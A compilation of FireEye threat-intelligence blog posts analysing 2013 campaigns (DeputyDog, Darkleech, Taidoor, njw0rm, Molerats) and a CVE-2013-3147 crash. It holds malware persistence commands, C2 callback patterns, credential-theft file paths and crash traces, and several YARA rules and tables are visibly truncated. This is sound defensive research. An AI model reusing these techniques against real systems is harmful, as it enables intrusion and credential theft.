FireEye has discovered a campaign leveraging the recently announced zero-day CVE-2013-3893. This campaign, which we have labeled ‘Operation DeputyDog', began as early as August 19, 2013 and appears to have targeted organizations in Japan. FireEye Labs has been continuously monitoring the activities of the threat actor responsible for this campaign. Analysis based on our Dynamic Threat Intelligence cluster shows that this current campaign leveraged command and control infrastructure that is related to the infrastructure used in the attack on Bit9.

Campaign Details

On September 17, 2013 Microsoft published details regarding a new zero-day exploit in Internet Explorer that was being used in targeted attacks. FireEye can confirm reports that these attacks were directed against entities in Japan. Furthermore, FireEye has discovered that the group responsible for this new operation is the same threat actor that compromised Bit9 in February 2013.

FireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a server in Hong Kong ( and was named “img20130823.jpg”. Although it had a .jpg file extension, it was not an image file. The file, when XORed with 0x95, was an executable (MD5: 8aba4b5184072f2a50cbc5ecfe326701).

Upon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5: 46fd936bada07819f61ec3790cb08e19) to this location:

C:\Documents and Settings\All Users\Application Data\28542CC0.dll

In order to maintain persistence, the original malware adds this registry key:


The registry key has this value:

rundll32.exe "C:\Documents and Settings\All Users\Application Data\28542CC0.dll",Launch

The malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea ( This callback traffic is HTTP over port 443 (which is typically used for HTTPS encrypted traffic; however, the traffic is not HTTPS nor SSL encrypted). Instead, this clear-text callback traffic resembles this pattern:

POST /info.asp HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Agtid: [8 chars]08x

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)


Content-Length: 1045

Connection: Keep-Alive

Cache-Control: no-cache

[8 chars]08x&[Base64 Content]

The unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the POST content as well.

A second related sample was also delivered from on September 5, 2013. The sun.css file was a malicious executable with an MD5 of bd07926c72739bb7121cec8a2863ad87 and it communicated with the same communications protocol described above to the same command and control server at

Related Samples

We found that both droppers, bd07926c72739bb7121cec8a2863ad87 and 8aba4b5184072f2a50cbc5ecfe326701, were compiled on 2013-08-19 at 13:21:59 UTC. As we examined these files, we noticed a unique fingerprint.

These samples both had a string that may have been an artifact of the builder used to create the binaries. This string was “DGGYDSYRL”, which we refer to as “DeputyDog”. As such, we developed the following YARA signature, based on this unique attribute:

rule APT_DeputyDog_Strings


author = "FireEye Labs"

version = "1.0"

description = "detects string seen in samples used in 2013-3893 0day attacks"

reference = "8aba4b5184072f2a50cbc5ecfe326701"

$mz = {4d 5a}


($mz at 0) and $a


We used this signature to identify 5 other potentially related samples:

MD5 Compile Time (UTC) C2 Server
58dc05118ef8b11dcb5f5c596ab772fd 58dc05118ef8b11dcb5f5c596ab772fd 2013-08-19 13:21:58 2013-08-19 13:21:58
4d257e569539973ab0bbafee8fb87582 4d257e569539973ab0bbafee8fb87582 2013-08-19 13:21:58 2013-08-19 13:21:58
dbdb1032d7bb4757d6011fb1d077856c dbdb1032d7bb4757d6011fb1d077856c 2013-08-19 13:21:59 2013-08-19 13:21:59
645e29b7c6319295ae8b13ce8575dc1d 645e29b7c6319295ae8b13ce8575dc1d 2013-08-19 13:21:59 2013-08-19 13:21:59
e9c73997694a897d3c6aadb26ed34797 e9c73997694a897d3c6aadb26ed34797 2013-04-13 13:42:45 2013-04-13 13:42:45

Note that all of the samples, except for e9c73997694a897d3c6aadb26ed34797, were compiled on 2013-08-19, within 1 second of each other.

We pivoted off the command and control IP addresses used by these samples and found the following known malicious domains recently pointed to

Domain First Seen Last Seen 2013-09-01 05:02:22 2013-09-01 05:02:22 2013-09-01 08:25:22 2013-09-01 08:25:22 2013-09-01 05:02:21 2013-09-01 05:02:21 2013-09-01 08:25:24 2013-09-01 08:25:24 2013-09-01 05:02:20 2013-09-01 05:02:20 2013-09-01 08:25:22 2013-09-01 08:25:22 2013-07-01 10:48:56 2013-07-01 10:48:56 2013-07-09 05:00:03 2013-07-09 05:00:03

Links to Previous Campaigns

According to Bit9, the attackers that penetrated their network dropped two variants of the HiKit rootkit. One of these Hitkit samples connected to a command and control server at downloadmp3server[.]servemp3[.]com that resolved to This same IP address also hosted www[.]yahooeast[.]net, a known malicious domain, between March 6, 2012 and April 22, 2012.

The domain yahooeast[.]net was registered to This email address was also used to register blankchair[.]com – the domain that we see was pointed to the IP, which is the callback associated with sample 58dc05118ef8b11dcb5f5c596ab772fd, and has been already correlated back to the attack leveraging the CVE-2013-3893 zero-day vulnerability.

Threat Actor Attribution



While these attackers have a demonstrated previously unknown zero-day exploits and a robust set of malware payloads, using the techniques described above, it is still possible for network defense professionals to develop a rich set of indicators that can be used to detect their attacks. This is the first part of our analysis, we will provide more detailed analysis on the other components of this attack in subsequent blog post.

Darkleech Says Hello

There's never a dull day at FireEye -- even on the weekends. At approximately 7:29 AM PDT today, we were notified by several security researchers that a fireeye[.]com/careers HR link was inadvertently serving up a drive-by download exploit. Our internal security, IT operations team, and third-party partners quickly researched and discovered that the malicious code was not hosted directly on any FireEye web infrastructure, but rather, it was hosted on a third-party advertiser (aka "malvertisement") that was linked via one of our third-party web services. The team then responded and immediately removed links to the malicious code in conjunction with our partners in order to protect our website users. More information on this third-party compromise (of video.js) can be found here.

Technical Details

The full redirect looked like this:




(redirect to) -> hxxp://xxx[.]xxxxxxxx[.]com/career/


(calls) -> hxxp://vjs[.]zencdn[.]net/c/video.js (VULNERABLE JAVASCRIPT)

(calls) -> hxxp://cdn[.]adsbarscipt[.]com/links/jump/ (MALVERTISEMENT)

(calls) -> hxxp://209[.]239[.]127[.]185/591918d6c2e8ce3f53ed8b93fb0735cd

/face-book.php (EXPLOIT URL)

(drops) -> MD5: 01771c3500a5b1543f4fb43945337c7d




So what was this, anyway?

It turns out, this attack was not targeted and it was not a watering hole attack. Instead, this campaign appears to be a recent wave of the Darkleech malware campaign, where third-party Horde/IMP Plesk Webmail servers were vulnerable to attack and used to serve up Java exploits that ultimately drop yet another ransomware named Reveton (similar to Urausy) -- yet other AV engines report it as a Zeus Bot (Zbot) variant.

Do FireEye products detect this attack?

Yes, the initial infection vector, payload, and corresponding Reveton callbacks were fully detected across all FireEye products prior to this incident being reported to us. In fact, this particular Reveton sample has been reported by approximately 49 of our worldwide customers, so far. Further intelligence about this threat is listed below:

  • DTI Statistics for MD5: 01771c3500a5b1543f4fb43945337c7d
  • MD5 first seen by our customers: 2013-09-14 07:12:40 UTC
  • Number of unique worldwide FireEye Web MPS detections: 188+
  • Number of unique FireEye Web MPS customers reported/alerted on this sample: 49+
  • Number of industries affected: 12+

Industries affected by Reveton

Lastly, FireEye acknowledges and thanks security researchers Inaki Rodriguez and Stephanus J Alex Taidri for bringing this issue to our attention.

Technical Analysis of CVE-2013-3147

In July, Microsoft released a patch for a memory-corruption vulnerability in the Internet Explorer (IE) Web browser. The vulnerability enabled remote attackers to execute arbitrary code or cause a denial of service through a crafted or compromised website — also known as a drive-by download.

This vulnerability is particularly interesting because it is so simple that even some tutorials on the web can trigger it, and it is unique to IE. The vulnerability exists in onbeforeeditfocus event. Only Internet Explorer supports this event (detailed information can be found at


The vulnerability triggers when the document markup is manipulated inside the handler of onbeforeeditfocus event. It leads to a crash in mshtml!CElement::BubbleBecomeCurrent when the instruction tries to access the freed pointer.

Following is the state of registers at the time of crash.

0:008> r

eax=00000004 ebx=00000000 ecx=06034f88 edx=80000035 esi=06082fb0

edi=048466a8 eip=636b31fe esp=037cf9b8 ebp=037cf9d4 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246


636b31fe 8b7604 mov esi,dword ptr [esi+4] ds:0023:06082fb4=????????

At this stage ESI holds the freed pointer.

0:008> !heap -p -a esi

address 06082fb0 found in

_DPH_HEAP_ROOT @ 141000

in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)

5802a58: 6082000 2000

7c927553 ntdll!RtlFreeHeap+0x000000f9

63625834 mshtml!CTreeNode::Release+0x0000002d

63640cea mshtml!PlainRelease+0x00000033

63662fec mshtml!CTreeNode::NodeRelease+0x0000002a

635bd2d4 mshtml!CElement::BecomeCurrent+0x00000145

636b31eb mshtml!CElement::BubbleBecomeCurrent+0x00000094

637eeb74 mshtml!CElement::BubbleBecomeCurrent+0x0000004c

636b5dd5 mshtml!CDoc::PumpMessage+0x0000096a

635f1fea mshtml!CDoc::OnMouseMessage+0x0000055d

635ef664 mshtml!CDoc::OnWindowMessage+0x000007af

6364207a mshtml!CServer::WndProc+0x00000078

7e418734 USER32!InternalCallWinProc+0x00000028

7e418816 USER32!UserCallWinProcCheckWow+0x00000150

7e4189cd USER32!DispatchMessageWorker+0x00000306

7e418a10 USER32!DispatchMessageW+0x0000000f

02562ec9 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000461

Following was the size of allocation where ESI is pointing:

ESI: 6082fb0

address 06082fb0 found in

_DPH_HEAP_ROOT @ 141000

in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)

5802a58: 6082fb0 4c - 6082000 2000

7c918f01 ntdll!RtlAllocateHeap+0x00000e64

635a8225 mshtml!CHtmRootParseCtx::BeginElement+0x00000030

635bc1e9 mshtml!CHtmTextParseCtx::BeginElement+0x0000006c

635a8420 mshtml!CHtmParse::BeginElement+0x000000b7

635a93b4 mshtml!CHtmParse::ParseBeginTag+0x000000fe

635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082

635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237

635a734c mshtml!CHtmPost::Exec+0x00000221

635ac2b8 mshtml!CHtmPost::Run+0x00000015

635ac21b mshtml!PostManExecute+0x000001fd

635cece9 mshtml!CPostManager::PostManOnTimer+0x00000134

6364de62 mshtml!GlobalWndOnMethodCall+0x000000fb

6363c3c5 mshtml!GlobalWndProc+0x00000183

7e418734 USER32!InternalCallWinProc+0x00000028

7e418816 USER32!UserCallWinProcCheckWow+0x00000150

7e4189cd USER32!DispatchMessageWorker+0x00000306

But the story doesn’t end here. The instruction on which we are getting an exception is moving the pointer at [ESI+4] to ESI. So looking to the pointer, which is at [ESI+4], is important. If we monitor the ESI, then we will see the following sequence (note: the value of ESI is changed from the previous one because I collected this information at the second run):

ESI: 48bafb0 [ESI+4]: 6050fb0 [[ESI+4]]: 5ff0fd0 [[[ESI+4]]]: 635ba8c0

ESI: 48bafb0 [ESI+4]: 0 <---------------------- Exception

The exception instruction is expecting 6050fb0 at [ESI+4]. But because the pointer is freed, we hit an exception. The address 6050fb0 is the pointer to object 5ff0fd0 of type 635ba8c0 as we can see in the above lines and can also verify with the below windbg command.

0:008> ln 635ba8c0

(635ba8c0) mshtml!CBodyElement::`vftable' | (637812c0) mshtml!CStackDataAry

<unsigned short,128>::`vftable'

Exact matches:

mshtml!CBodyElement::`vftable' = <no type information>

Possible Code Execution Path:

This situation can lead to code execution because the value at [ESI+4] propagates to  the CElement::BecomeCurrent method which again calls the CElement::Doc method to access the vftable and call a function.

Following is the disassembly of the faulty function:

Our program crashes here:






Here, a few checks are getting the value of EBX. But EBX is also in control, and the value of EBX remains the same as it was in the beginning of the function call.






This isn't the first IE vulnerability in which the CElement::Doc function played a role — in at least one other past vulnerabilityCElement::Doc function played a key role in the code execution.

(Thanks to my colleagues Abhishek Singh and Yichong Lin for their suggestions.)

Evasive Tactics: Taidoor

The Taidoor malware has been used in many ongoing cyber espionage campaigns. Its victims include government agencies, corporate entities, and think tanks, especially those with interests in Taiwan. [1] In a typical attack, targets receive a spear-phishing email which encourages them to open an attached file. If opened on a vulnerable system, malware is silently installed on the target’s computer while a decoy document with legitimate content is opened that is intended to alleviate any suspicions the target may have. Taidoor has been successfully compromising targets since 2008, and continues to be active today.

Despite being around for a long time – and quite well known – Taidoor is a constantly evolving, persistent threat. We observed significant tactical changes in 2011 and 2012, when the malicious email attachments did not drop the Taidoor malware directly, but instead dropped a “downloader” that then grabbed the traditional Taidoor malware from the Internet. [2]

Recently, we observed a new variant of Taidoor, which was used in targeted attacks. It has evolved in two ways. Instead of downloading the traditional Taidoor malware from a command-and-control (CnC) server, the “downloader” reaches out to Yahoo Blogs and retrieves encrypted text from blog posts. When decrypted by the “downloader”, this text is actually a modified version of the traditional Taidoor malware. This new version of Taidoor maintains similar behavior, but has been changed enough to avoid common network detection signatures.

Traditional Taidoor Malware

The Taidoor malware is traditionally delivered as an email attachment. If opened, the Taidoor malware is dropped onto the target’s system, and starts to beacon to a CnC server. Taidoor connects to its CnCs using HTTP, and the “GET” request has been consistent since 2008. It follows a simple pattern:

GET /[5 characters].php?id=[6 numbers][12 characters/numbers]

The last set of 12 characters is actually the encrypted MAC address of the compromised computer. The values of the MAC address are incremented by 1, and this is used as an RC4 key to encrypt the data that is passed between the compromised computer and its CnC server.

The New Taidoor

In the past, other APT campaigns have used blog hosting platforms as a mechanism to transmit CnC server information to compromised targets. [3] Attackers using Taidoor have leveraged this model as well.

We analyzed a sample (be1d972819e0c5bf80bf1691cc563400) that when opened exploits a vulnerability in Microsoft Office (CVE-2012-0158) to drop malware on the target’s computer.


The decoy document contains background information on trade liberalization between the People’s Republic of China (PRC) and Taiwan.

The various strings in the file are XOR-encoded with the key "0x02" or "0x03".


This malware is a simple “downloader” that, instead of connecting to a CnC server, connects to a Yahoo Blog and downloads the contents of a blog post.


GET /jw!JRkdqkKGAh6MPj9MlwbK6iMgScE- HTTP/1.1

Accept: /

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)

Accept-Encoding: gzip, deflate


Connection: Keep-Alive



The content of the blog post between the markers “ctxugfbyyxyyyxyy” and “yxyyyxyyctxugfby” is encoded with base64 and encrypted using the RC4 cipher. The encryption key, which we discovered to be "asdfasdf", is also present in the contents of the base64 blog data in an encrypted form. The decrypted content of the blog post is a DLL file – that is in fact the Taidoor malware.


After the first-stage dropper downloads and decrypts the Taidoor malware, it then begins to connect to two CnC servers: ( and ( However, the network traffic (its “callback”) has been modified from the traditional version.


GET /default.jsp?vx=vsutnh191138F9744C HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Connection: Keep-Alive

Cache-Control: no-cache


Rather than having “[five characters].php”, this new file path ends in “.jsp” and may have any of the following file names:

  • process
  • page
  • default
  • index
  • user
  • parse
  • about
  • security
  • query
  • login

The new format is:

/[file name].jsp?[2 random characters]=[6 random characters][encrypted MAC address]

In addition to the use of other malicious Word documents (b0fd4d5fb6d8acb1ccfb54d53c08f11f), we have also seen this new Taidoor variant distributed as a Windows ScreenSaver file (.scr) posing as a PDF (d9940a3da42eb2bb8e19a84235d86e91) or a Word document (c4de3fea790f8ff6452016db5d7aa33f).




It remains unclear whether all of this Taidoor activity is related or different groups are using the same malware for different purposes. The fact that Taidoor is not off-the-shelf malware that can simply be downloaded or purchased in the cybercrime underground suggests that all of this activity may be connected in some way.


So far, we have found only one large cluster of activity associated with this new Taidoor variant. This cluster, which made use of Yahoo Blogs, appears to have targeted entities in Taiwan. We found that traditional versions of Taidoor have also been using this infrastructure. [4]

Malware Connections

We found that another, possibly related, malware family known as “Taleret” is using the same technique that this Taidoor variant has used. We found that samples (such as 6cd1bf0e8adcc7208b82e1506efdba8d, 525fd346b9511a84bbe26eb47b845d89 and 5c887a31fb4713e17c5dda9d78aab9fe) connect to Yahoo Blogs in order to retrieve a list of CnC servers.


The content between the two markers “XXXXX” is encoded with base64 and encrypted with the RC4 cipher. The encryption key is “c37f12a0” in hex, and hardcoded in the malware.


We extracted the following CnC servers from these blog posts:

  • www.facebook.trickip.NET
  • www.braintrust.AlmostMy.COM

As with Taidoor, there appears to be a frequent association with Taiwan, in addition to a similar CnC naming scheme – such as (Taidoor) and (Taleret).


The Taidoor malware has been used to successfully compromise targets since 2008. This threat has evolved over time, and has recently leveraged Yahoo Blogs as a mechanism to drop the Taidoor malware as a “second stage” component. In addition, the well-known Taidoor network traffic pattern has been modified, likely as a new way to avoid network-based detection.



2. and

3. and reports of associated malware here and here

4. MD5 hashes of traditional Taidoor samples 811aae1a66f6a2722849333293cbf9cd 454c9960e89d02e4922245efb8ef6b49 5efc35315e87fdc67dada06fb700a8c7 bc69a262bcd418d194ce2aac7da47286

Njw0rm – Brother From the Same Mother

FireEye Labs has discovered an intriguing new sibling of the njRAT remote access tool (RAT) that one-ups its older "brother" with a couple of diabolically clever features. Created by the same author as njRAT —a freelance coder who goes by the moniker njq8 — the new njw0rm malware has the ability to spread using removable computer storage and can steal login credentials to a popular dynamic DNS service.

The older njRAT was first documented about a year ago by FireEye as Backdoor.LV. Most of the command-and-control (CnC) infrastructure associated with njRAT, like many of its targets, were based in the Middle East. The CnC servers associated with njw0rm are also based in the Middle East, though we have not yet seen njw0rm used in targeted attacks.

Njw0rm has the usual RAT features, but adds a key enhancement — it is designed to spread via removable devices such as USB drives. FireEye researchers have seen njw0rm delivered initially through malicious links in emails and using drive-by downloads on compromised websites. The malware aims to steal user credentials, execute commands, and receive future updates from the attacker.


Njw0rm is coded in Visual Basic script, but requires AutoIt to build the dropper. It provides an attacker with common options such as the ability to designate a name for its binary, configure its CnC servers, whether to “melt” or delete the binary after execution, and so on.


When you first start the builder, it asks you to assign a port for incoming traffic (1888 by default).


Control panel

The control panel contains a window for logging and another window with details of active infections.


The name of the infected machine is followed by the serial number of the %homedrive%. It also includes information on its location, OS (and service pack installations), removable storage devices present, and currently active windows.

The following functions are available from the control panel:


Data Theft

The Get Passwords command has the capability to steal passwords from three different sources:

  • FTP passwords stored under %appdata%\Filezilla\recentservers.xml
  • Chrome browser passwords in \Google\Chrome\User Data\Default\Login Data\
  • Account credentials for the No-IP dynamic DNS service by reading the registry key at HKLM\SOFTWARE\Vitalwerks\DUC and base64-decoding it

The credentials stored inside Google Chrome’s Web browser are decrypted locally using the CryptUnprotectData() function provided by Crypt32.dll. This API enables an application to decrypt Triple-DES encrypted passwords as long as they are encrypted with the same logon credentials.

The ability to steal No-IP credentials is unique. Many threat actors use dynamic DNS domains for their infrastructure. So an attacker with stolen No-IP credentials could use the service to perform reconnaissance or target other systems.

Callback Communication

The Njw0rm bot connects to the CnC server and waits for commands. If no command is received, the worm sends the following information to the following hard-coded domain:port every two seconds.


The above code roughly translates to:

“lv” + 0njxq80 + name_serial + 0njxq80 + Kernel32.dll.GetLocaleInfo()+ 0njxq80 + OS info + 0njxq80 + worm version + 0njxq80 + removable drive available + 0njxq80 + title of active window

Like njRAT, njw0rm uses the "lv" keyword and as a field separator.


The Worm Aspect

Njw0rm constantly checks for removable devices present on the host. If a removable drive’s status is “Ready” and it has more than 1024 megabytes free, njw0rm creates a hidden My Pictures directory (if it doesn't already exist). It then gets a list of 10 folders on the removable drive, hides those 10 folders, and creates shortcut links with the same names for each of them — all pointing to the malware executable. When unsuspecting users click on one of the shortcuts to open what they think is a familiar folder, they execute the worm instead.


Connections to njRAT

Looking at the comments section of the code, researchers can conclude that njw0rm is coded by njq8, the author who also created njRAT. Although njw0rm’s communications are not base64 encoded, it uses the same keyword "lv" at the beginning of every communication and “0njxq80” as a delimiter instead of “|”, two features that are identical to njRAT’s communication.

The malware's author is prolific. According to his profile, he lives in Kuwait and is a coder for hire.worm19

Based on the comments in the source code, njworm was last updated on May 16th with version 0.3.3a. We have seen versions ranging from 0.2 – 0.4d in the wild. The newer version likely includes bot-killer functionality that was left unfinished in 0.3.3a.

worm20CnC Information

We have seen communications back to the following domains and ports:  1888  18888  81  1888  18  1888  1888  1888  8888  4040 8888

Geolocations of CnC

Most of the njworm's CnC infrastructure is hosted in the Middle East — just like njRAT — with a few exceptions.



The Njw0rm RAT is clearly authored by the same person who wrote njRAT. Like njRAT, most of the njw0rm CnC infrastructure is also hosted in the Middle East. The callback structure is also similar to njRAT. Currently, the worm does not appear to be used in a targeted fashion. But based on the callback data, njw0rm is evolving quickly — so expect to see more of it in the future.

(Special thanks to Thoufique Haq for his help with this research.)

File hashes

02b32f094ddc1b5d0c0ab86a5fae7c91 02dc77b3ae7a17a6720eec9624b24ae9 02e144a10e8f3a24a335a96cd69f8086 053702add48f4455088798fff2b4e690 05b5008acd534f4e419902c85f169531 07c65bd8926cf6c249bc04470b555c65 08f240f494a5e4f2cbfb9f764d1738e6 0f828b31bb91fcdcf1533ed7cd3e3313 110d0b6e29d84dd2f690703197082743 12f679546ada9d65c21a8e879128139d 13977ef247db77c11b9b8f407c9f3f6c 1c448c5488ac4a391f6fae0a5880adaf 1cb5a011c3888aa981d8f3cc0c74fc2e 21af26854fa5318d1f8787ebbc9dce20 253647d1ee71c19c136db94b9f7af3d2 2cf983063f2a33685f34ab53d076d2ce 2dc7b434520365c6ab3f5bdadcb84765 2fe7df0c84f6bb0d53922bbe79123295 42f549140f5fec8f63c118d649b1659f 4c60493b14c666c56db163203e819272 57d8b563b587aecee18387a016f49710 5c12b6694032134f213a51df047c5968 7717e996de4d1444c76b3ab4432027b2 7e5c0b55917721a7463b00c89c8f3154 807e6783a4212e1fb20a6f1f0a7b006b 86022d7f987e9cf54fad35a89c3d9e84 908634d98e166031e0904575ed7f4e2e 93d8dc5ff775ef8d9f9355e8e516e232 9c25d1a88bf96f73207a57ccb184d993 a36117133263dc538d2b9291835d94e9 a62b3a47e485fda57d5f183ebb237683 a89c76bce3d8eab6451da7d579bbd9fa a90a254d547042cd2936f9c89359c442 ab6e0b3d0cf57c507935578987c289c3 b0e1d20accd9a2ed29cdacb803e4a89d b412222c50bd51b4770245cfee71346b ba2952386cd8295ca69665b65a24e635 bab466ab747c94e55d0c1685404cc548 f06c6fd7ee79f035b0b683364d5f2af2 f0abdb8084a416e8353bc520abe0471b f3ae62b63f3b78b9c0be30d0ffd10592 f6b31d4abeb50db38093003bd93dc02e f863f3878ebd2e449beb78dc214380ab ff573fc5a7c9b12fa15c984eb0228a64

Operation Molerats: Middle East Cyber Attacks Using Poison Ivy

Don't be too hasty to link every Poison Ivy-based cyber attack to China. The popular remote access tool (RAT), which we recently detailed on this blog, is being used in a broad campaign of attacks launched from the Middle East, too.

First, some background:

In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks. [1] Security researchers subsequently linked these attacks to a broader, yearlong campaign that targeted not just Israelis but Palestinians as well. [2] — and as discovered later, even the U.S. and UK governments. [3] Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.” 

Threat actors in specific geographic regions may prefer one RAT to another, but many RATs are publicly available and used by a variety of threat actors, including those involved in malware-based espionage.

In 2012, the Molerats attacks appeared to rely heavily on the XtremeRAT, a freely available tool that is popular with attackers based in the Middle East. [5] But the group has also used Poison Ivy (PIVY), a RAT more commonly associated with threat actors in China [6] — so much so that PIVY has, inaccurately, become synonymous with all APT attacks linked to China.

This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files. [7]

Enter Poison Ivy

We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control (CnC) infrastructure used by the Molerats attackers.


The malware sample we analyzed was unusual for two reasons:

  • It referenced an article that was published last year
  • The compile time for the dropped binary was also dated from last year, seemingly consistent with the referenced article. But this malware was signed, and — in contrast to the compile time, which can be faked — the signing time on its certificate was much more recent: Monday, July 08, 2013 1:45:10 A.M.

Here are the file details:

Hamas shoot down Israeli F-16 fighter jet by modern weapon in Gaza sea.doc- - - - - - - - - - - -.scr

MD5: 7084f3a2d63a16a191b7fcb2b19f0e0d


This malware was signed with a forged Microsoft certificate similar to previous XtremeRat samples. But the serial number (which is often reused by attackers, enabling FireEye researchers to link individual attacks, including those by the Molerats) is different this time.


The malware dropped an instance of PIVY with the following configuration:


ID: F16 08-07-2013


DNS/Port: Direct:,

Proxy DNS/Port:

Proxy Hijack: No

ActiveX Startup Key:

HKLM Startup Entry:

File Name:

Install Path: C:\Documents and Settings\Admin\Local Settings\Temp\morse.exe

Keylog Path: C:\Documents and Settings\Admin\Local Settings\Temp\morse

Inject: No

Process Mutex: gdfgdfgdg

Key Logger Mutex:

ActiveX Startup: No

HKLM Startup: No

Copy To: No

Melt: No

Persistence: No

Keylogger: No

Password: !@#GooD#@!


We collected additional PIVY samples that had the same password or linked to CnC infrastructure at a common IP address (or both). We observed three PIVY passwords (another potential identifier) used in the attacks: “!@#GooD#@!”, “!@#Goood#@!” and “admin100”.

Additional Samples with Middle Eastern Themes

We also found a PIVY sample used by this group that leveraged what are known as key files instead of passwords. The PIVY builder allows operators to load .pik files containing a key to secure communications between the compromised computer and the attacker's machine. By default, PIVY secures these communications with the ascii text password of "admin" — when the same non-default password appears in multiple attacks, researchers can conclude that the attacks are related.

The PIVY sample in question had an MD5 hash of 9dff139bbbe476770294fb86f4e156ac and communicated with a CnC server at over port 443. The key file used to secure communications contained the following ascii string ‘Password (256 bits):\x0d\x0aA9612889F6’ (where \x0d\x0a represents a line break).


The 9dff139bbbe476770294fb86f4e156ac sample dropped a decoy document in Arabic that included a transcript of an interview with Salam Fayyad, the former Prime Minister of the Palestinian National Authority.

The sample 16346b95e6deef9da7fe796c31b9dec4 was also seen communicating with over port 443. This sample appears to have been delivered to its targets via a link to a RAR archive labeled Ramadan.rar (fc554a0ad7cf9d4f47ec4f297dbde375) hosted at the Dropbox file-sharing website.


The sample a8714aac274a18f1724d9702d40030bf dropped a decoy document in Arabic that contained a biography of General Adbel Fattah el-Sisi – the Commander-in-Chief of the Egyptian Armed Forces.


A recent sample (d9a7c4a100cfefef995785f707be895c) used protests in Egypt to entice recipients to open a malicious file.


Another sample (b0a9abc76a2b4335074a13939c59bfc9) contained a decoy with a grim picture of Fadel Al Radfani, who was the adviser to the defense minister of Yemen before he was assassinated.

Although we are seeing Egyptian- and Middle Eastern-themed attacks using decoy content in Arabic, we cannot determine the intended targets of all of these attacks.

Delivery Vector

We believe that the Molerats attacker uses spear phishing to deliver weaponized RAR files containing their malicious payloads to their victims in at least two different ways. The Molerats actor will in some cases attach the weaponized RAR file directly to their spear- phishing-emails. We also believe that this actor sends spear-phishing emails that include links to RAR files hosted on third-party platforms such as Dropbox.

In one such example we found the following link was used to host Ramadan.rar (fc554a0ad7cf9d4f47ec4f297dbde375):


CnC Infrastructure

We have found 15 PIVY samples that can be linked through common passwords, common CnC domain names, and common IP addresses to which the CnC domains resolve. The CnC servers for this cluster of activity are:


Two of the domain names ( and that were used as CnCs for PIVY were both documented as XtremeRat CnCs that were used in previous attacks. [8]


We focused on these domains and their IP addresses — which they had in common with In addition, we added the well-known CnCs and used in previously documented attacks.

By observing changes in DNS resolution that occurred within the same timeframe, we were able to ensure that the passive DNS data we collected was the same. Interestingly, we also found that the domains often shifted to a new IP address over time.

CnC Date IP 2013-07-10 22:06:56
2013-07-10 22:05:31
2013-07-10 23:45:46
2013-07-10 23:48:41
2013-07-10 23:48:41
2013-07-10 22:06:56
2013-07-10 22:05:31
2013-07-10 23:45:46
2013-07-10 23:48:41
2013-07-10 23:48:41 2013-07-16 09:14:30
2013-07-16 11:33:21
2013-07-16 12:47:59
2013-07-16 12:50:51
2013-07-16 12:50:51
2013-07-16 09:14:30
2013-07-16 11:33:21
2013-07-16 12:47:59
2013-07-16 12:50:51
2013-07-16 12:50:51 2013-07-21 15:00:38
2013-07-21 15:28:43
2013-07-21 16:31:07
2013-07-21 15:00:38
2013-07-21 15:28:43
2013-07-21 16:31:07 2013-07-21 22:06:19
2013-07-21 22:04:49
2013-07-21 22:06:19
2013-07-21 22:04:49 2013-07-29 15:38:21
2013-07-29 15:35:52
2013-07-29 16:46:35
2013-07-29 16:49:27
2013-07-29 16:49:27
2013-07-29 15:38:21
2013-07-29 15:35:52
2013-07-29 16:46:35
2013-07-29 16:49:27
2013-07-29 16:49:27 2013-07-10 22:05:31
2013-07-10 22:06:35
2013-07-10 22:06:37
2013-07-10 22:06:56
2013-07-10 22:19:03
2013-07-10 22:19:31
2013-07-10 22:05:31
2013-07-10 22:06:35
2013-07-10 22:06:37
2013-07-10 22:06:56
2013-07-10 22:19:03
2013-07-10 22:19:31 2013-08-10 14:07:38
2013-08-10 14:08:43
2013-08-10 14:07:38
2013-08-10 14:08:43

One interesting discovery concerns a sample (5b740b4623b2d1049c0036a6aae684b0) that was first seen by VirusTotal on September 14, 2012. This date is within the timeframe of the original XtremeRat attacks, but the payload in this case was PIVY. This indicates that the attackers have been using PIVY in addition to XtremeRat for longer than we had originally believed.


We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective, publicly-available RAT to its arsenal. But this development should raise a warning flag for anyone tempted to automatically attribute all PIVY attacks to threat actors based in China. The ubiquity of off-the-shelf RATs makes determining those responsible an increasing challenge.

The ongoing attacks are also heavily leveraging content in Arabic that uses conflicts in Egypt and the wider Middle East to lure targets into opening malicious files. But we have no further information about the exact targets of these Arabic lures.

As events on the ground in the Middle East — and in Egypt in particular — receive international attention, we expect the Molerat operators to continue leveraging these headlines to catalyze their operations.







6. /content/dam/legacy/resources/pdfs/fireeye-poison-ivy-report.pdf

7. The Molerats group also uses addition RATs such as XtremeRat, Cerberus, Cybergate, but we have focused on their used of PIVY in this blog.


Yara Signature

This Yara signature can be used to locate signed samples that have the new certificate serial numbers used by Molerats.


rule Molerats_certs



author = “FireEye Labs”

description = “this rule detections code signed with certificates used by the Molerats actor”


